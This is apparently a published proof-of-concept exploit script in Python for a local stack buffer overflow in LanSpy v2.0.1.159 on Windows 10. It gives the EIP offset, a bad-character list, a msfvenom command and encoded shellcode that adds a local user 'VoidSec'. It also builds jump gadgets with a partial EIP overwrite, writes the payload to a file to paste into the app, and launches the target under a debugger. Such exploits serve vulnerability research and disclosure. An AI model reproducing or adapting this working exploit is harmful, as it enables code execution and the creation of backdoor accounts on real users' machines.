""" Exploit title: LanSpy v.2.0.1.159 - Stack Buffer Overflow Exploit Author: Paolo Stagno aka VoidSec - voidsec@voidsec.com - https://voidsec.com Vendor Homepage: https://lizardsystems.com/ Download: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe Version: v.2.0.1.159 Tested on: Windows 10 Pro x64 v.1909 Build 18363.418 Category: local exploits Platform: windows Usage: Open the APP > click on the scan field > paste the contents from the generated "LanSpy_v.2.0.1.159_exploit.txt" file """ #!/usr/bin/python import os,subprocess,struct,platform filename="LanSpy_v.2.0.1.159_exploit.txt" EIP_offset = 680 """ 03F9FB48 start of our "junk" buffer 03F9FDDB end of not corruppted "junk" buffer 03F9FDDB - 03F9FB48 = 659 - 22 (pad+stack_adj) = 637 bytes for shellcode """ stack_adj = "\x83\xec\x78" * 10 # stack_adj; sub esp,0x78 (120*10=1200) # BAD CHARS: \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c # msfvenom -p windows/adduser USER=VoidSec PASS=VoidSec1! -a x86 --platform windows -e x86/alpha_mixed -f python -v shellcode # Payload size: 608 bytes shellcode = b"" shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5b\x53\x59\x49" shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43" shellcode += b"\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50" shellcode += b"\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" shellcode += b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38" shellcode += b"\x41\x42\x75\x4a\x49\x79\x6c\x48\x68\x4e\x62" shellcode += b"\x63\x30\x75\x50\x45\x50\x71\x70\x4e\x69\x4a" shellcode += b"\x45\x46\x51\x39\x50\x65\x34\x4e\x6b\x42\x70" shellcode += b"\x70\x30\x4c\x4b\x62\x72\x56\x6c\x6e\x6b\x50" shellcode += b"\x52\x36\x74\x4c\x4b\x62\x52\x66\x48\x36\x6f" shellcode += b"\x6e\x57\x53\x7a\x54\x66\x35\x61\x59\x6f\x4c" shellcode += b"\x6c\x47\x4c\x30\x61\x33\x4c\x57\x72\x66\x4c" shellcode += b"\x31\x30\x79\x51\x38\x4f\x66\x6d\x35\x51\x58" shellcode += b"\x47\x6d\x32\x38\x72\x51\x42\x63\x67\x6e\x6b" shellcode += b"\x63\x62\x42\x30\x4e\x6b\x52\x6a\x67\x4c\x4e" shellcode += b"\x6b\x30\x4c\x72\x31\x74\x38\x39\x73\x42\x68" shellcode += b"\x43\x31\x7a\x71\x36\x31\x4c\x4b\x50\x59\x31" shellcode += b"\x30\x46\x61\x58\x53\x6e\x6b\x67\x39\x65\x48" shellcode += b"\x58\x63\x47\x4a\x67\x39\x6e\x6b\x30\x34\x6e" shellcode += b"\x6b\x63\x31\x78\x56\x70\x31\x39\x6f\x4c\x6c" shellcode += b"\x6f\x31\x6a\x6f\x64\x4d\x53\x31\x6a\x67\x65" shellcode += b"\x68\x6d\x30\x61\x65\x4b\x46\x66\x63\x63\x4d" shellcode += b"\x69\x68\x75\x6b\x71\x6d\x44\x64\x50\x75\x68" shellcode += b"\x64\x53\x68\x6c\x4b\x42\x78\x67\x54\x33\x31" shellcode += b"\x5a\x73\x72\x46\x4e\x6b\x46\x6c\x72\x6b\x6c" shellcode += b"\x4b\x70\x58\x77\x6c\x63\x31\x69\x43\x4c\x4b" shellcode += b"\x65\x54\x6c\x4b\x36\x61\x4e\x30\x4c\x49\x37" shellcode += b"\x34\x37\x54\x56\x44\x43\x6b\x51\x4b\x63\x51" shellcode += b"\x31\x49\x33\x6a\x52\x71\x6b\x4f\x49\x70\x51" shellcode += b"\x4f\x63\x6f\x71\x4a\x6e\x6b\x34\x52\x68\x6b" shellcode += b"\x4e\x6d\x61\x4d\x30\x6a\x66\x61\x4e\x6d\x4f" shellcode += b"\x75\x68\x32\x67\x70\x75\x50\x57\x70\x32\x70" shellcode += b"\x72\x48\x66\x51\x6e\x6b\x42\x4f\x6f\x77\x39" shellcode += b"\x6f\x39\x45\x6d\x6b\x68\x70\x38\x35\x39\x32" shellcode += b"\x33\x66\x53\x58\x69\x36\x5a\x35\x6f\x4d\x6f" shellcode += b"\x6d\x49\x6f\x79\x45\x75\x6c\x44\x46\x33\x4c" shellcode += b"\x34\x4a\x6b\x30\x79\x6b\x4d\x30\x44\x35\x67" shellcode += b"\x75\x4d\x6b\x30\x47\x36\x73\x34\x32\x70\x6f" shellcode += b"\x63\x5a\x57\x70\x53\x63\x4b\x4f\x78\x55\x75" shellcode += b"\x33\x70\x6d\x42\x44\x34\x6e\x65\x35\x61\x68" shellcode += b"\x45\x35\x65\x70\x74\x6f\x45\x33\x51\x30\x52" shellcode += b"\x4e\x63\x55\x31\x64\x71\x30\x31\x65\x51\x63" shellcode += b"\x45\x35\x42\x52\x37\x50\x52\x76\x62\x4f\x43" shellcode += b"\x59\x70\x64\x42\x73\x30\x65\x43\x53\x65\x70" shellcode += b"\x30\x56\x42\x4f\x71\x79\x55\x34\x51\x43\x73" shellcode += b"\x55\x65\x33\x46\x51\x57\x51\x37\x50\x76\x4f" shellcode += b"\x63\x71\x42\x64\x42\x64\x77\x50\x75\x76\x46" shellcode += b"\x46\x37\x50\x30\x6e\x31\x75\x54\x34\x77\x50" shellcode += b"\x50\x6c\x50\x6f\x55\x33\x61\x71\x42\x4c\x75" shellcode += b"\x37\x32\x52\x70\x6f\x64\x35\x62\x50\x35\x70" shellcode += b"\x72\x61\x65\x34\x50\x6d\x62\x49\x70\x6e\x43" shellcode += b"\x59\x72\x53\x64\x34\x53\x42\x31\x71\x53\x44" shellcode += b"\x70\x6f\x64\x32\x64\x33\x65\x70\x71\x46\x32" shellcode += b"\x4f\x55\x39\x63\x54\x33\x63\x72\x45\x52\x43" shellcode += b"\x55\x70\x46\x4f\x43\x71\x42\x64\x52\x64\x35" shellcode += b"\x50\x41\x41" pad = "A" * 12 jmp_far = "\xe9\x5c\xfd\xff\xff" # JMP FAR BACKWARDS jmp_short = "\x41\xeb\xf6\x41" # ECX point here ; JMP SHORT BACKWARDS eip = "\xad\x40\x40" # EIP 0x004040ad : jmp ecx | startnull {PAGE_EXECUTE_READ} [lanspy.exe] ; partial overwrite to keep \x00 (that is a null byte) # original nSEH and SEH below are left untouched # nSEH # SEH payload = "A" * ( EIP_offset - len(stack_adj) - len(shellcode) - len(pad) - len(jmp_far) - len(jmp_short) ) + stack_adj + shellcode + pad + jmp_far + jmp_short + eip f = open(filename, 'w') f.write(payload) f.close() print("Wrote {} bytes".format(len(payload))) ver = platform.machine() if ver.endswith('64'): debuggercmd = "C:\\Program Files (x86)\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe" else: debuggercmd = "C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe" subprocess.call([debuggercmd,"C:\\Program Files (x86)\\LizardSystems\\LanSpy\\lanspy.exe",""])